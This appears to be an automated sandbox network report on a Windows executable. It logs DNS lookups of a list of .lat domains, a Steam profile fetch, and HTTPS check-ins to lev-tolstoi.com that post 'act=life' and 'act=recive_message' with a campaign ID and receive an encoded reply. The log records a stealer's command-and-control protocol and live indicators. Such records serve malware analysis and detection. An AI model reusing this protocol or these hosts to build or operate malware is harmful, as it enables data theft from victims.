                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:57.523428917 CET49713443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:57.523525953 CET49713443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:57.523534060 CET44349713104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:58.302040100 CET44349713104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:58.302145004 CET44349713104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:58.302318096 CET49713443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:58.302508116 CET49713443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:58.302531004 CET44349713104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:59.475188971 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:59.475277901 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:59.475373030 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:59.475744009 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:59.475775957 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.687659979 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.687761068 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.689431906 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.689443111 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.689646959 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.691732883 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.692586899 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.692615986 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.693574905 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.693608046 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.693758011 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.693800926 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.693945885 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.693979979 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.694133997 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.694173098 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.694333076 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.694370031 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.694377899 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.694392920 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.694546938 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.694574118 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.694600105 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.694744110 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.694771051 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.735332012 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.735564947 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.735598087 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.735622883 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.735649109 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.735690117 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:00.735708952 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:03.034374952 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:03.034466028 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:03.034552097 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:03.034822941 CET49714443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:03.034841061 CET44349714104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:03.068788052 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:03.068840981 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:03.068917036 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:03.069262981 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:03.069281101 CET44349715104.21.66.86192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:19:03.935118914 CET49715443192.168.2.8104.21.66.86
                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:39.971143961 CET5615253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.109747887 CET53561521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.115628958 CET5927653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.334506989 CET53592761.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.337316990 CET6206153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.475939989 CET53620611.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.479722977 CET5957053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.618311882 CET53595701.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.622144938 CET4950053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.851032019 CET53495001.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.855062008 CET6001053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.994257927 CET53600101.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.998286963 CET6505053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.219141960 CET53650501.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.223179102 CET5762753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.361880064 CET53576271.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.363940001 CET6185853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.504023075 CET53618581.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.507692099 CET6553453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.646256924 CET53655341.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.122273922 CET5861953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.264846087 CET53586191.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:39.971143961 CET192.168.2.81.1.1.10x6aa4Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.115628958 CET192.168.2.81.1.1.10x2f9cStandard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.337316990 CET192.168.2.81.1.1.10x9f29Standard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.479722977 CET192.168.2.81.1.1.10x3c20Standard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.622144938 CET192.168.2.81.1.1.10xe23dStandard query (0)energyaffai.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.855062008 CET192.168.2.81.1.1.10x4835Standard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.998286963 CET192.168.2.81.1.1.10xfc07Standard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.223179102 CET192.168.2.81.1.1.10xc4fStandard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.363940001 CET192.168.2.81.1.1.10xc622Standard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.507692099 CET192.168.2.81.1.1.10x3fc5Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.122273922 CET192.168.2.81.1.1.10x7e26Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.109747887 CET1.1.1.1192.168.2.80x6aa4Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.334506989 CET1.1.1.1192.168.2.80x2f9cName error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.475939989 CET1.1.1.1192.168.2.80x9f29Name error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.618311882 CET1.1.1.1192.168.2.80x3c20Name error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.851032019 CET1.1.1.1192.168.2.80xe23dName error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:40.994257927 CET1.1.1.1192.168.2.80x4835Name error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.219141960 CET1.1.1.1192.168.2.80xfc07Name error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.361880064 CET1.1.1.1192.168.2.80xc4fName error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.504023075 CET1.1.1.1192.168.2.80xc622Name error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:41.646256924 CET1.1.1.1192.168.2.80x3fc5No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.264846087 CET1.1.1.1192.168.2.80x7e26No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:18:44.264846087 CET1.1.1.1192.168.2.80x7e26No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                                                  • lev-tolstoi.com
                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.84970423.55.153.1064431464C:\Users\user\Desktop\0gnHF2twcT.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:18:43 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                                  2024-12-23 06:18:43 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:18:43 GMT
                                                                                                                                                                                                                                                                  Content-Length: 35121
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: sessionid=16219b16eba2e1d25c63a86f; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                  2024-12-23 06:18:43 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                  2024-12-23 06:18:44 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                  Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                  2024-12-23 06:18:44 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                  Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  1192.168.2.849705104.21.66.864431464C:\Users\user\Desktop\0gnHF2twcT.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:18:45 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:18:45 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                                                                  2024-12-23 06:18:46 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:18:46 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=rvv1vtn1sqk57dktdtkt0m0jaj; expires=Fri, 18 Apr 2025 00:05:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6cBhmk9traACxqc2rJ2K6vcHXyQW5ck2kYE01POGvP%2BjDb9MlgBl3x8k5Mp0DJ30YG2IA0LlEQZ51%2BUahwyXfpVmc4m81MDgRitoTHcTTtRBz1FrA%2F5zF0jfvYcqVjJI6hs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f663c73ffcb43a6-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1596&rtt_var=765&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1829573&cwnd=186&unsent_bytes=0&cid=93f65b983148dc7d&ts=762&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:18:46 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                                                                                                  2024-12-23 06:18:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  2192.168.2.849706104.21.66.864431464C:\Users\user\Desktop\0gnHF2twcT.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:18:47 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 47
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:18:47 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                                  2024-12-23 06:18:48 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:18:48 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=sdq7r0c7mh1l34q3d356oelqki; expires=Fri, 18 Apr 2025 00:05:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPe%2BI6ktVGM7wXOQqyUiSlU9NWMMmwniV%2FyBj%2BzchLIdFsgMajaZSW7dNOY5ZXNVXC1EcFtv5CZjONcG2Zu%2FWk10gFDXcKJl6yPO9u6KGmW4lZkcpQ3nFUEmHV1L%2FlMCIZg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f663c807a1843ad-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1597&rtt_var=602&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=946&delivery_rate=1814791&cwnd=203&unsent_bytes=0&cid=69ba1f01fc6960a9&ts=1055&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:18:48 UTC241INData Raw: 31 34 37 39 0d 0a 39 73 39 4d 53 76 63 71 72 64 79 2b 75 2b 5a 7a 52 4d 66 2f 72 6d 70 6f 55 6d 77 38 77 64 73 32 47 5a 64 50 6b 44 47 43 48 43 36 4e 37 54 70 6f 7a 52 36 42 2f 73 33 65 78 45 6b 77 74 59 72 4c 52 6b 6f 7a 43 42 37 37 76 56 64 31 35 43 71 38 45 2f 52 78 44 4d 79 70 4c 53 61 45 54 34 48 2b 32 38 50 45 53 52 2b 38 33 63 73 45 53 6d 68 4f 57 61 75 35 56 33 58 31 4c 76 74 65 38 6e 42 4e 6e 71 4d 72 49 70 4a 4a 79 62 33 53 31 6f 4d 57 49 61 61 56 77 41 4d 46 4f 67 45 65 37 66 6c 54 59 37 56 31 73 6e 7a 6e 61 45 2b 37 72 6a 38 68 31 56 65 42 70 35 7a 65 69 46 46 2b 35 5a 37 4c 43 41 51 30 43 46 65 70 73 31 35 39 39 43 76 36 51 65 74 36 52 70 36 74 4b 43 4f 59 51 4e 32 77 32 4e 47 49 45 43 75 6d 33 59 4a
                                                                                                                                                                                                                                                                  Data Ascii: 14799s9MSvcqrdy+u+ZzRMf/rmpoUmw8wds2GZdPkDGCHC6N7TpozR6B/s3exEkwtYrLRkozCB77vVd15Cq8E/RxDMypLSaET4H+28PESR+83csESmhOWau5V3X1Lvte8nBNnqMrIpJJyb3S1oMWIaaVwAMFOgEe7flTY7V1snznaE+7rj8h1VeBp5zeiFF+5Z7LCAQ0CFeps1599Cv6Qet6Rp6tKCOYQN2w2NGIECum3YJ
